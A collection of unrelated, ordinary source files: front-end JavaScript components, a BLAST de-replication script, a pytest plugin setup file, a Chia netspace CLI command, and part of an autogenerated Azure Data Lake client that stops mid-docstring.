e;return{style:{zIndex:4e4+this.overlayIndex},class:Object.assign({},Object(a.a)(this.cssClass),(e={},e[""+this.mode]=!0,e["loading-translucent"]=this.translucent,e))}},e.prototype.render=function(){return[Object(o.b)("ion-backdrop",{visible:this.showBackdrop,tappable:this.backdropDismiss}),Object(o.b)("div",{class:"loading-wrapper",role:"dialog"},this.spinner&&Object(o.b)("div",{class:"loading-spinner"},Object(o.b)("ion-spinner",{name:this.spinner})),this.message&&Object(o.b)("div",{class:"loading-content"},this.message))]},Object.defineProperty(e,"is",{get:function(){return"ion-loading"},enumerable:!0,configurable:!0}),Object.defineProperty(e,"encapsulation",{get:function(){return"scoped"},enumerable:!0,configurable:!0}),Object.defineProperty(e,"properties",{get:function(){return{animated:{type:Boolean,attr:"animated"},backdropDismiss:{type:Boolean,attr:"backdrop-dismiss"},config:{context:"config"},cssClass:{type:String,attr:"css-class"},dismiss:{method:!0},duration:{type:Number,attr:"duration"},el:{elementRef:!0},enterAnimation:{type:"Any",attr:"enter-animation"},keyboardClose:{type:Boolean,attr:"keyboard-close"},leaveAnimation:{type:"Any",attr:"leave-animation"},message:{type:String,attr:"message"},mode:{type:String,attr:"mode"},onDidDismiss:{method:!0},onWillDismiss:{method:!0},overlayIndex:{type:Number,attr:"overlay-index"},present:{method:!0},showBackdrop:{type:Boolean,attr:"show-backd
rop"},spinner:{type:String,attr:"spinner",mutable:!0},translucent:{type:Boolean,attr:"translucent"}}},enumerable:!0,configurable:!0}),Object.defineProperty(e,"events",{get:function(){return[{name:"ionLoadingDidPresent",method:"didPresent",bubbles:!0,cancelable:!0,composed:!0},{name:"ionLoadingWillPresent",method:"willPresent",bubbles:!0,cancelable:!0,composed:!0},{name:"ionLoadingWillDismiss",method:"willDismiss",bubbles:!0,cancelable:!0,composed:!0},{name:"ionLoadingDidDismiss",method:"didDismiss",bubbles:!0,cancelable:!0,composed:!0}]},enumerable:!0,configurable:!0}),Object.defineProperty(e,"listeners",{get:function(){return[{name:"ionBackdropTap",method:"onBackdropTap"}]},enumerable:!0,configurable:!0}),Object.defineProperty(e,"style",{get:function(){return".sc-ion-loading-md-h{--min-width:auto;--width:auto;--min-height:auto;--height:auto;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;left:0;right:0;top:0;bottom:0;display:-ms-flexbox;display:flex;position:fixed;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;font-family:var(--ion-font-family,inherit);contain:strict;-ms-touch-action:none;touch-action:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;z-index:1000}.overlay-hidden.sc-ion-loading-md-h{display:none}.loading-wrapper.sc-ion-loading-md{display:-ms-flexbox;display:flex;-ms-flex-align:inherit;align-items:inherit;-ms-flex-pack:inherit;justify-content:inherit;width:var(--width);min-width:var(--min-width);max-width:var(--max-width);height:var(--height);min-height:var(--min-height);max-height:var(--max-height);background:var(--background);opacity:0;z-index:10}.spinner-bubbles.sc-ion-loading-md, .spinner-circles.sc-ion-loading-md, .spinner-crescent.sc-ion-loading-md, .spinner-dots.sc-ion-loading-md, .spinner-lines.sc-ion-loading-md, 
.spinner-lines-small.sc-ion-loading-md{color:var(--spinner-color)}.sc-ion-loading-md-h{--background:var(--ion-color-step-50,#f2f2f2);--max-width:280px;--max-height:90%;--spinner-color:var(--ion-color-primary,#3880ff);color:var(--ion-color-step-850,#262626);font-size:14px}.loading-wrapper.sc-ion-loading-md{border-radius:2px;padding-left:24px;padding-right:24px;padding-top:24px;padding-bottom:24px;-webkit-box-shadow:0 16px 20px rgba(0,0,0,.4);box-shadow:0 16px 20px rgba(0,0,0,.4)}@supports ((-webkit-margin-start:0) or (margin-inline-start:0)) or (-webkit-margin-start:0){.loading-wrapper.sc-ion-loading-md{padding-left:unset;padding-right:unset;-webkit-padding-start:24px;padding-inline-start:24px;-webkit-padding-end:24px;padding-inline-end:24px}}.loading-spinner.sc-ion-loading-md + .loading-content.sc-ion-loading-md{margin-left:16px}@supports ((-webkit-margin-start:0) or (margin-inline-start:0)) or (-webkit-margin-start:0){.loading-spinner.sc-ion-loading-md + .loading-content.sc-ion-loading-md{margin-left:unset;-webkit-margin-start:16px;margin-inline-start:16px}}"},enumerable:!0,configurable:!0}),Object.defineProperty(e,"styleMode",{get:function(){return"md"},enumerable:!0,configurable:!0}),e}(),m=function(){function e(){}return e.prototype.create=function(e){return Object(r.f)(this.doc.createElement("ion-loading"),e)},e.prototype.dismiss=function(e,n,t){return Object(r.g)(this.doc,e,n,"ion-loading",t)},e.prototype.getTop=function(){return i.a(this,void 0,void 0,function(){return i.c(this,function(e){return[2,Object(r.h)(this.doc,"ion-loading")]})})},Object.defineProperty(e,"is",{get:function(){return"ion-loading-controller"},enumerable:!0,configurable:!0}),Object.defineProperty(e,"properties",{get:function(){return{create:{method:!0},dismiss:{method:!0},doc:{context:"document"},getTop:{method:!0}}},enumerable:!0,configurable:!0}),e}()}}]);
|
// "initcap" filter: upper-cases the first character of the input string.
app.filter("initcap",function(){
    return function(value){
        // Guard: Angular runs filters with undefined/null/empty input during
        // digest cycles; return the input unchanged instead of throwing
        // "Cannot read property 'charAt' of undefined".
        if (!value) {
            return value;
        }
        return value.charAt(0).toUpperCase() + value.substring(1);
    };
});
|
#!/bin/env python
"""
Created on Tues Aug 14 8:59:11 2018
@author: francinecamacho
"""
"""This script takes in a BLAST tabular output file produced by BLASTing a fasta file against itself, and parses
out the duplicated clusters, proteins or genes from the fasta file. It assumes the BLAST search was run with the
--perc_identity parameter, which is necessary for BLAST to calculate the query coverage on hits that passed
with the desired percent identity. The output is the de-replicated fasta file, and a text file with the unique cluster,
protein or gene names."""
from Bio import SeqIO
import pandas as pd
import networkx as nx
import os
def makeDataFrame(PATH, tabularHeader, coverageCutOff, perc_identity):
    """Load the BLAST tabular output and filter it to significant non-self hits.

    PATH           -- path (or buffer) of the tab-separated BLAST output
    tabularHeader  -- space-separated column names matching the BLAST -outfmt
    coverageCutOff -- minimum query coverage (qcovs) for a hit to be kept
    perc_identity  -- minimum percent identity (pident) for a hit to be kept

    Returns (uniqueQID, filteredDF): the array of all distinct query ids seen
    in the file, and the DataFrame of hits that pass both thresholds and are
    not self-hits (qseqid == sseqid).
    """
    columns = tabularHeader.split(" ")
    table = pd.read_csv(PATH, sep="\t", names=columns, header=None)
    # Build one boolean mask: drop self-hits, keep hits meeting both thresholds.
    keep = (
        (table.sseqid != table.qseqid)
        & (table.qcovs >= coverageCutOff)
        & (table.pident >= perc_identity)
    )
    filteredDF = table[keep]
    uniqueQID = table['qseqid'].unique()  # every query, filtered or not
    print("Number of inputted BGCs:", len(uniqueQID))
    return uniqueQID, filteredDF
def makeLengthDict(df):
    """Map every sequence id (query or subject) to its reported length.

    Iterates the filtered hit DataFrame in row order; the first occurrence
    of an id wins, matching the original implementation.
    """
    lengths = {}
    for query_id, subject_id, query_len, subject_len in zip(
            df['qseqid'], df['sseqid'], df['qlen'], df['slen']):
        lengths.setdefault(query_id, query_len)
        lengths.setdefault(subject_id, subject_len)
    return lengths
def createNetworkGraph(df):
    """Build an undirected graph of BLAST hits and return its connected components.

    Nodes are sequence ids; an edge joins each (qseqid, sseqid) pair in the
    filtered DataFrame.  Each connected component ("hub") groups sequences that
    are duplicates of one another.  Returns a list of subgraph views.
    """
    bgc_network = nx.from_pandas_edgelist(df, source="qseqid", target="sseqid",
                                          create_using=nx.Graph())
    # Bug fix: nx.connected_component_subgraphs() was deprecated in networkx
    # 2.1 and removed in 2.4; build the equivalent subgraph views from
    # nx.connected_components() instead (same view semantics as copy=False).
    subgraphs = [bgc_network.subgraph(component)
                 for component in nx.connected_components(bgc_network)]
    print("Number of hubs:", len(subgraphs))
    return subgraphs
def findMaxBGC(matchesArray, qlenDict):
    """Return the id in *matchesArray* with the greatest length in *qlenDict*.

    Ties keep the earliest element (strict comparison, like the original loop);
    an empty *matchesArray* yields None.
    """
    return max(matchesArray, key=lambda bgc: qlenDict[bgc], default=None)
def findUniqueBGCs(subgraphs, bgcList, outdir, outfile, allBGCs):
    """Select one representative (the longest) BGC per duplicate hub.

    subgraphs -- connected components of the hit graph (duplicate "hubs")
    bgcList   -- id -> sequence length mapping (from makeLengthDict)
    outdir    -- directory the name list is written into (becomes the cwd)
    outfile   -- prefix for "<outfile>_uniqueBGCNames.txt"
    allBGCs   -- every query id seen in the BLAST table

    BGCs that never matched anything are unique by definition and are kept as
    well.  Writes the combined name list to a tab-separated text file (unless
    it is empty) and returns it.
    """
    os.chdir(outdir)
    representatives = []
    matched = []
    for hub in subgraphs:
        print("======================================================")
        print ('networkx subgraph:', hub.nodes())
        matched = list(hub.nodes()) + matched
        longest = findMaxBGC(hub.nodes(), bgcList)
        representatives.append(longest)
        print ('Longest BGC in matches:', longest)
        print("======================================================")
    # Everything that appears in no hub had no qualifying match at all.
    singletons = list(set(allBGCs) - set(matched))
    combined_unique_bgcs = singletons + representatives
    if len(combined_unique_bgcs) == 0:
        print("Error: Could not identify any duplicates from input file")
    else:
        names_df = pd.Series(combined_unique_bgcs).to_frame("bgcName")
        # Tab-separated text file listing the unique BGC names, one per line.
        names_df.to_csv(outfile + "_uniqueBGCNames.txt", index=False, sep='\t')
        print ('Total unique BGCs:', len(combined_unique_bgcs))
    return combined_unique_bgcs
def createFastaFile(uniqueBGCList, bgcMasterList, outdir, outfile):
    """Write "<outfile>_uniqueBGCs.fa" in *outdir* containing only the records
    of *bgcMasterList* (the original master fasta file) whose ids appear in
    *uniqueBGCList*.
    """
    os.chdir(outdir)
    fastafileName = outfile + "_uniqueBGCs.fa"
    unique_ids = set(uniqueBGCList)  # O(1) membership instead of a list scan per record
    with open(fastafileName, 'w') as uniqueFile:
        for seq_record in SeqIO.parse(bgcMasterList, 'fasta'):
            if seq_record.id in unique_ids:
                seq_record.description = ""  # keep only the id on the header line
                SeqIO.write(seq_record, uniqueFile, "fasta")
    # (The explicit close() inside the original `with` block was redundant;
    # the context manager already closes the file.)
def main(tabular_file, outdir, outfile, perc_identity, coverage_cutoff, bgc_master_file,
         tabular_file_header):
    """Run the de-replication pipeline end to end: parse the BLAST table,
    graph the duplicate hubs, pick the unique representatives, and write the
    de-replicated fasta plus the unique-name list."""
    # Guard clause: an empty tabular file means BLAST produced no output.
    if os.stat(tabular_file).st_size == 0:
        print("ERROR: Inputted tabular file is empty.")
        return
    unique_qid_array, dfObject = makeDataFrame(tabular_file, tabular_file_header,
                                               coverage_cutoff, perc_identity)
    query_len_dict = makeLengthDict(dfObject)
    query_network_graph = createNetworkGraph(dfObject)
    unique_bgc_list = findUniqueBGCs(query_network_graph, query_len_dict, outdir,
                                     outfile, unique_qid_array)
    createFastaFile(unique_bgc_list, bgc_master_file, outdir, outfile)
# Command-line entry point: parse arguments and run the de-replication pipeline.
if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('--tabular_file', type=str, required=True, help='blast tabular file results')
    # NOTE(review): --outdir is optional with no default, so omitting it passes
    # None into os.chdir() downstream and crashes — confirm whether it should be
    # required=True or default to '.'.
    parser.add_argument('--outdir', type=str,
                        help='directory to output files')
    parser.add_argument('--outfile', type=str, required=True, help='name of cohort or project')
    # Thresholds (percentages, 0-100) forwarded to the BLAST-hit filter.
    parser.add_argument('--perc_identity', type=int, required=False, default=95, help='default is 95')
    parser.add_argument('--coverage_cutoff', type=int, required=False, default=95, help='default is 95')
    parser.add_argument('--bgc_master_file', type=str, required=True,
                        help='fasta file used for BLAST and de-replication')
    # Column names must match the -outfmt specification used for the BLAST run.
    parser.add_argument('--tabular_file_header', type=str, required=False,
                        default="sseqid qseqid slen qlen qcovs pident Evalue qstart qend", help='sseqid qseqid slen qlen qcovs pident Evalue qstart qend')
    args = parser.parse_args()
    main(args.tabular_file, args.outdir, args.outfile, args.perc_identity, args.coverage_cutoff,
         args.bgc_master_file, args.tabular_file_header)
|
from setuptools import setup
# The long description shown on PyPI comes straight from the project's
# reStructuredText README.
with open("README.rst") as readme_file:
    long_description = readme_file.read()
# Package metadata for the pytest-describe plugin; the 'pytest11' entry
# point is how pytest discovers and loads the plugin module.
setup(
    name='pytest-describe',
    version='2.0.0',
    description='Describe-style plugin for pytest',
    long_description=long_description,
    long_description_content_type='text/x-rst',
    url='https://github.com/pytest-dev/pytest-describe',
    author='Robin Pedersen',
    author_email='robinpeder@gmail.com',
    license='MIT license',
    install_requires=[
        'pytest>=4.0.0',
    ],
    entry_points={
        'pytest11': [
            'pytest-describe = pytest_describe.plugin'
        ],
    },
    packages=['pytest_describe'],
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: POSIX',
        'Operating System :: Microsoft :: Windows',
        'Operating System :: MacOS :: MacOS X',
        'Topic :: Software Development :: Testing',
        'Topic :: Software Development :: Libraries',
        'Topic :: Utilities',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
    ],
)
|
document.write("<script src='js/function.js'></script>");
document.write("<script src='js-unit/jquery-easyui/plugins/jquery.pagination.js'></script>");
$.extend({
initTable: function(domObject, options) {
var _op = $.extend({
width: '920',
pagination: true,
columns: [],
data: [],
queryParams: {},
title: false,
fitColumns: true,
singleSelect: false, //是否只允许选中一行
// rownumbers: false,
striped: true,
method: 'get',
loadMsg: '数据加载中.....',
showFooter: true,
pageSize: 30,
pageList: [20, 30, 50, 100],//可以设置每页记录条数的列表
onLoadSuccess: function () {
}
}, options);
$(domObject).datagrid(_op);
if (_op.pagination === true) {
$(domObject).datagrid('getPager').pagination({
beforePageText: '第',//页数文本框前显示的汉字
afterPageText: '页 共 {pages} 页',
displayMsg: '当前显示 {from} - {to} 条记录 共 {total} 条记录'
});
}
}
});
/**
 * EChartsDIY: renders three dashboard charts (time line, pie, bar) plus a
 * "top direct subordinates" table. The page sets the *Url / startTime /
 * endTime fields before calling the init* entry points.
 */
var EchartsDIY = {
    // Query window shared by every chart request.
    startTime: '',
    endTime: '',
    showId: '',
    // Most recently fetched dataset (overwritten by each _get* call).
    data: '',
    // Server endpoints, assigned by the embedding page.
    dateLineUrl: '',
    pieChartUrl: '',
    barChartUrl: '',
    topList: [],
    directSubTopUrl: '',
    dateLineOptions: {
        title: {
            text: ''
        },
        tooltip: {
            trigger: 'axis',
            axisPointer: {
                animation: false
            }
        },
        xAxis: {
            type: 'time',
            splitLine: {
                show: false
            }
        },
        yAxis: {
            type: 'value',
            boundaryGap: [0, '100%'],
            splitLine: {
                show: false
            }
        },
        series: [{
            name: '新增下级:',
            type: 'line',
            showSymbol: false,
            hoverAnimation: false,
            data: []
        }]
    },
    pieOptions : {
        title : {
            text: '',
            subtext: '',
            x:'center'
        },
        tooltip : {
            trigger: 'item',
        },
        legend: {
            orient: 'vertical',
            left: 'left',
            data: []
        },
        series : [
            {
                name: '',
                type: 'pie',
                radius : '55%',
                center: ['50%', '60%'],
                data:[],
                itemStyle: {
                    emphasis: {
                        shadowBlur: 10,
                        shadowOffsetX: 0,
                        shadowColor: 'rgba(0, 0, 0, 0.5)'
                    }
                }
            }
        ]
    },
    barOptions: {
        color: ['#3398DB'],
        tooltip : {
            trigger: 'axis',
            axisPointer : { // axis pointer shown while hovering the axis
                type : 'shadow' // default is a straight line; 'line' | 'shadow'
            }
        },
        grid: {
            left: '3%',
            right: '4%',
            bottom: '30%',
            containLabel: true
        },
        xAxis : [
            {
                type : 'category',
                data : [],
                axisTick: {
                    alignWithLabel: true
                },
                axisLabel: {
                    interval: 0,
                    rotate: 60
                }
            }
        ],
        yAxis : [
            {
                type : 'value'
            }
        ],
        series : [
            {
                name:'',
                type:'bar',
                barWidth: '60%',
                data:[]
            }
        ]
    },
    // Shared pre-render hook (intentionally empty; pages may override).
    init: function() {
    },
    /**
     * Initialise the time-line chart.
     */
    initDateLine: function(){
        this.init();
        this._renderDateLine();
    },
    _renderDateLine: function(){
        // _getDateLineData runs synchronously (async: false), so this.data
        // is populated before the chart is drawn below.
        this._getDateLineData();
        var myChart = echarts.init(document.getElementById('newAddSubLevel'));
        this.dateLineOptions.series[0].data = this.data;
        myChart.setOption(this.dateLineOptions);
        this._renderDirectSubTop();
    },
    _renderDirectSubTop: function() {
        this._getDirectSubTop();
        var html = '';
        $.each(this.topList, function(k, v){
            html += "<tr>";
            html += "<td>" +(k + 1)+ "</td>";
            html += "<td>" + v.newNums + "</td>";
            html += "<td>" + v.directName + "</td>";
            html += "</tr>";
        });
        $("#js-sub-top-table").find("tbody").html('').append(html);
    },
    _getDirectSubTop: function(){
        var _this = this;
        $.ajax({
            url: _this.directSubTopUrl,
            type: "post",
            dataType: "json",
            // BUGFIX: _renderDirectSubTop reads this.topList immediately
            // after this call returns, so the request must be synchronous
            // (it was async, leaving topList empty/stale on render) —
            // matches the existing _getDateLineData pattern.
            async: false,
            data: {startTime: _this.startTime, endTime: _this.endTime},
            success: function (data) {
                _this.topList = data.data;
            }
        });
    },
    _getDateLineData: function(){
        var _this = this;
        $.ajax({
            url: _this.dateLineUrl,
            type: "post",
            dataType: "json",
            async: false,
            data: {startTime: _this.startTime, endTime: _this.endTime},
            success: function (data) {
                _this.data = data.data;
            }
        });
    },
    /**
     * Initialise the pie chart.
     */
    initPieChart: function(){
        this.init();
        this._renderPieChart();
    },
    _renderPieChart: function(){
        this._getPieChartData();
        var myChart = echarts.init(document.getElementById('noActiveRate'));
        this.pieOptions.series[0].data = this.data;
        myChart.setOption(this.pieOptions);
    },
    _getPieChartData: function(){
        this._getDate();
        var _this = this;
        _this.pieOptions.legend.data = [];
        $.ajax({
            url: _this.pieChartUrl,
            type: "post",
            dataType: "json",
            // BUGFIX: _renderPieChart reads this.data right after this call,
            // so the request must be synchronous like _getBarChartData.
            async: false,
            data: {startTime: _this.startTime, endTime: _this.endTime},
            success: function (data) {
                _this.data = data.data;
                $.each (data.data, function(k, v) {
                    _this.pieOptions.legend.data.push(v.name);
                });
            }
        });
    },
    /**
     * Initialise the bar chart.
     */
    initBarChart: function(){
        this.init();
        this._renderBarChart();
    },
    _renderBarChart: function(){
        this._getBarChartData();
        var myChart = echarts.init(document.getElementById('subLevelPlay'));
        myChart.setOption(this.barOptions);
    },
    _getBarChartData: function(){
        // NOTE(review): _getDate() is not defined on this object — it is
        // presumably mixed in elsewhere; verify before relying on it.
        this._getDate();
        var _this = this;
        _this.barOptions.xAxis[0].data = [];
        _this.barOptions.series[0].data = [];
        $.ajax({
            url: _this.barChartUrl,
            type: "post",
            dataType: "json",
            async: false,
            data: {startTime: _this.startTime, endTime: _this.endTime},
            success: function (data) {
                $.each (data.data, function(k, v) {
                    _this.barOptions.series[0].name = '玩彩情况:';
                    _this.barOptions.xAxis[0].data.push(v.name);
                    _this.barOptions.series[0].data.push(v.value);
                });
            }
        });
    }
};
var DataTime = {
    // Display/parse pattern handed to bootstrap-datetimepicker.
    format: "yyyy-mm-dd hh:ii:ss",
    minView: "hour",
    startTime: "",
    endTime: "",
    /**
     * (Re)build the paired start/end datetime pickers, keeping each
     * picker's selectable range consistent with the other field's value.
     */
    init: function () {
        var self = this;
        // Tear down any previous picker instances before re-initialising.
        $(".form_start_datetime").datetimepicker("remove");
        $(".form_end_datetime").datetimepicker("remove");
        $(".form_start_datetime")
            .datetimepicker({
                minView: self.minView,
                language: 'zh-CN',
                autoclose: true,
                format: self.format,
                todayHighlight: true
            })
            .on("click", function () {
                // The start picker must not go past the chosen end time.
                $(this).datetimepicker("setEndDate", $(this).next('.form_end_datetime').val());
                if (self.startTime != '') {
                    $(this).datetimepicker("setStartDate", self.startTime);
                }
            });
        $(".form_end_datetime")
            .datetimepicker({
                minView: self.minView,
                language: 'zh-CN',
                autoclose: true,
                format: self.format,
                todayHighlight: true
            })
            .on("click", function () {
                // The end picker is bounded by the chosen start time and "now".
                $(this).datetimepicker("setStartDate", $(this).prev(".form_start_datetime").val());
                $(this).datetimepicker("setEndDate", new Date);
            });
    },
    // Switch the picker granularity (e.g. day-only vs. down-to-the-hour).
    setFormat: function (format, minView) {
        this.format = format;
        this.minView = minView;
    },
    // Lower bound applied to the start picker on next open.
    setStartTime: function (startTime) {
        this.startTime = startTime;
    }
};
/**
 * TableGrids: configures and renders an EasyUI datagrid, wiring up the
 * search button and the quick date-range buttons.
 */
var TableGrids = {
    id: '',
    data: [],
    url : '',
    columns: [],
    queryParams: {},
    pagination: true,
    showFooter: true,
    onLoadSuccess: function(){},
    // Reference definition showing the expected shape of `columns`
    // (EasyUI datagrid: an array of column-group arrays).
    exampleTable: {
        url : "#",
        columns : [
            [
                {field: 'fieldOne', width: 110, title: '第一列', sortable: false, align: 'center', frozen: true},
                {field: 'fieldTwo', width: 80, title: '第二列', sortable: false, align: 'center', frozen: true},
                {field: 'fieldThree', width: 80, title: '第三列', sortable: false, align: 'center', frozen: true}
            ]
        ]
    },
    // Build (or rebuild) the datagrid from the current instance state.
    showTable : function (){
        var _this = this;
        $.initTable(_this.id, {
            url: _this.url,
            data: [],
            columns: _this.columns,
            queryParams: _this.queryParams,
            pagination: _this.pagination,
            showFooter: _this.showFooter,
            onLoadSuccess: _this.onLoadSuccess
        });
    },
    // Reload the grid with the current query parameters.
    _loadTable: function(){
        var _this = this;
        $(_this.id).datagrid('load', _this.queryParams);
    },
    /**
     * Entry point: run the named initializer, then render the table.
     * @param initFn name of an initializer method on this object,
     *               e.g. "initExampleTable"
     * @param id     selector of the datagrid element
     */
    init: function(initFn, id) {
        // BUGFIX/security: dynamic property lookup replaces the previous
        // eval()-built call string — same dispatch, no code evaluation,
        // and ids containing quotes can no longer break the call.
        this[initFn]('' + id);
        this.showTable();
    },
    /*
     * Initialise the example table (game records / betting report).
     */
    initExampleTable: function(id) {
        this.columns = this.exampleTable.columns;
        this.url = this.exampleTable.url;
        this.id = id;
        this.pagination = true;
        this.showFooter = true;
        this._getTableParams();
        this._bindSearchEvent();
        this._bindDateSpeed('#startTime', "#endTime");
    },
    // Wire the search button to refresh the grid with fresh parameters.
    _bindSearchEvent: function (){
        var _this = this;
        $("#searchButton").unbind("click").bind("click", function(){
            _this._getTableParams();
            _this._loadTable();
        });
    },
    // Collect the current filter values into queryParams (none by default).
    _getTableParams: function(){
        this.queryParams = {
        };
    },
    /**
     * Bind the quick date-range buttons.
     * @param startTimeId selector of the start-time input
     * @param endTimeId   selector of the end-time input
     * @private
     */
    _bindDateSpeed: function(startTimeId, endTimeId){
        var _this = this;
        $(".js-date-speed").unbind("click").bind("click", function(){
            _this.queryParams.startTime = $(this).attr("data-start-date");
            _this.queryParams.endTime = $(this).attr("data-end-date");
            $(startTimeId).val(_this.queryParams.startTime);
            $(endTimeId).val(_this.queryParams.endTime);
            _this._loadTable();
        });
    }
};
|
"use strict";
Object.defineProperty(exports, "__esModule", { value: true });
const tslib_1 = require("tslib");
//Exports all handler functions
(0, tslib_1.__exportStar)(require("./mappings/mappingHandlers"), exports);
|
// Client-side validation for the sign-in form: block submission while
// either field is empty, alerting the user (messages intentionally in
// Spanish — they are user-facing runtime strings).
$(document).on('submit', 'form.form-signin', function (e) {
    // Validate the nickname field.
    var nickname = $('input#nickname').val();
    if (nickname === '') { // strict compare; also removed stray ';' after the block
        alert('Escribe tu Usuario');
        $('input#nickname').focus();
        return false;
    }
    // Validate the password field.
    var password = $('input#password').val();
    if (password === '') {
        alert('Escribe tu Contraseña');
        $('input#password').focus();
        return false;
    }
    // Both fields present — let the submit proceed.
});
|
import click
@click.command("netspace", short_help="Estimate total farmed space on the network")
@click.option(
"-p",
"--rpc-port",
help=(
"Set the port where the Full Node is hosting the RPC interface. "
"See the rpc_port under full_node in config.yaml. "
"[default: 8555]"
),
type=int,
default=None,
)
@click.option(
"-d",
"--delta-block-height",
help=(
"Compare a block X blocks older to estimate total network space. "
"Defaults to 4608 blocks (~1 day) and Peak block as the starting block. "
"Use --start BLOCK_HEIGHT to specify starting block. "
"Use 192 blocks to estimate over the last hour."
),
type=str,
default="4608",
)
@click.option(
"-s",
"--start",
help="Newest block used to calculate estimated total network space. Defaults to Peak block.",
type=str,
default="",
)
def netspace_cmd(rpc_port: int, delta_block_height: str, start: str) -> None:
"""
Calculates the estimated space on the network given two block header hashes.
"""
import asyncio
from .netspace_funcs import netstorge_async
asyncio.run(netstorge_async(rpc_port, delta_block_height, start))
|
import car_all as car
# Exercise the base Car class and the ElectricCar subclass through the
# same descriptive-name API, printing one line per vehicle.
for vehicle in (
    car.Car('volkswagen', 'beetle', 2016),
    car.ElectricCar('tesla', 'model s', 2016),
):
    print(vehicle.get_descriptive_name())
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from .. import models as _models
# Typing-only imports: evaluated by type checkers, skipped at runtime.
if TYPE_CHECKING:
    # pylint: disable=unused-import,ungrouped-imports
    from typing import Any, Callable, Dict, Generic, IO, Optional, TypeVar, Union
T = TypeVar('T')
# Signature of the optional `cls` response-transform callback accepted by
# each operation: (pipeline_response, deserialized_body, response_headers).
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PathOperations(object):
"""PathOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.storage.filedatalake.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
    def __init__(self, client, config, serializer, deserializer):
        """Store the pipeline client, service configuration, and the
        (de)serializers used by every operation in this group."""
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    def create(
        self,
        request_id_parameter=None, # type: Optional[str]
        timeout=None, # type: Optional[int]
        resource=None, # type: Optional[Union[str, "_models.PathResourceType"]]
        continuation=None, # type: Optional[str]
        mode=None, # type: Optional[Union[str, "_models.PathRenameMode"]]
        rename_source=None, # type: Optional[str]
        source_lease_id=None, # type: Optional[str]
        properties=None, # type: Optional[str]
        permissions=None, # type: Optional[str]
        umask=None, # type: Optional[str]
        path_http_headers=None, # type: Optional["_models.PathHTTPHeaders"]
        lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"]
        modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"]
        source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"]
        **kwargs # type: Any
    ):
        # type: (...) -> None
        """Create File | Create Directory | Rename File | Rename Directory.
        Create or rename a file or directory. By default, the destination is overwritten and if the
        destination already exists and has a lease the lease is broken. This operation supports
        conditional HTTP requests. For more information, see `Specifying Conditional Headers for Blob
        Service Operations <https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-
        conditional-headers-for-blob-service-operations>`_. To fail if the destination already exists,
        use a conditional request with If-None-Match: "*".
        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
         limit that is recorded in the analytics logs when storage analytics logging is enabled.
        :type request_id_parameter: str
        :param timeout: The timeout parameter is expressed in seconds. For more information, see
         :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
         timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
        :type timeout: int
        :param resource: Required only for Create File and Create Directory. The value must be "file"
         or "directory".
        :type resource: str or ~azure.storage.filedatalake.models.PathResourceType
        :param continuation: Optional. When deleting a directory, the number of paths that are deleted
         with each invocation is limited. If the number of paths to be deleted exceeds this limit, a
         continuation token is returned in this response header. When a continuation token is returned
         in the response, it must be specified in a subsequent invocation of the delete operation to
         continue deleting the directory.
        :type continuation: str
        :param mode: Optional. Valid only when namespace is enabled. This parameter determines the
         behavior of the rename operation. The value must be "legacy" or "posix", and the default value
         will be "posix".
        :type mode: str or ~azure.storage.filedatalake.models.PathRenameMode
        :param rename_source: An optional file or directory to be renamed. The value must have the
         following format: "/{filesystem}/{path}". If "x-ms-properties" is specified, the properties
         will overwrite the existing properties; otherwise, the existing properties will be preserved.
         This value must be a URL percent-encoded string. Note that the string may only contain ASCII
         characters in the ISO-8859-1 character set.
        :type rename_source: str
        :param source_lease_id: A lease ID for the source path. If specified, the source path must have
         an active lease and the lease ID must match.
        :type source_lease_id: str
        :param properties: Optional. User-defined properties to be stored with the filesystem, in the
         format of a comma-separated list of name and value pairs "n1=v1, n2=v2, ...", where each value
         is a base64 encoded string. Note that the string may only contain ASCII characters in the
         ISO-8859-1 character set. If the filesystem exists, any properties not included in the list
         will be removed. All properties are removed if the header is omitted. To merge new and
         existing properties, first get all existing properties and the current E-Tag, then make a
         conditional request with the E-Tag and include values for all properties.
        :type properties: str
        :param permissions: Optional and only valid if Hierarchical Namespace is enabled for the
         account. Sets POSIX access permissions for the file owner, the file owning group, and others.
         Each class may be granted read, write, or execute permission. The sticky bit is also
         supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported.
        :type permissions: str
        :param umask: Optional and only valid if Hierarchical Namespace is enabled for the account.
         When creating a file or directory and the parent folder does not have a default ACL, the umask
         restricts the permissions of the file or directory to be created. The resulting permission is
         given by p bitwise and not u, where p is the permission and u is the umask. For example, if p
         is 0777 and u is 0057, then the resulting permission is 0720. The default permission is 0777
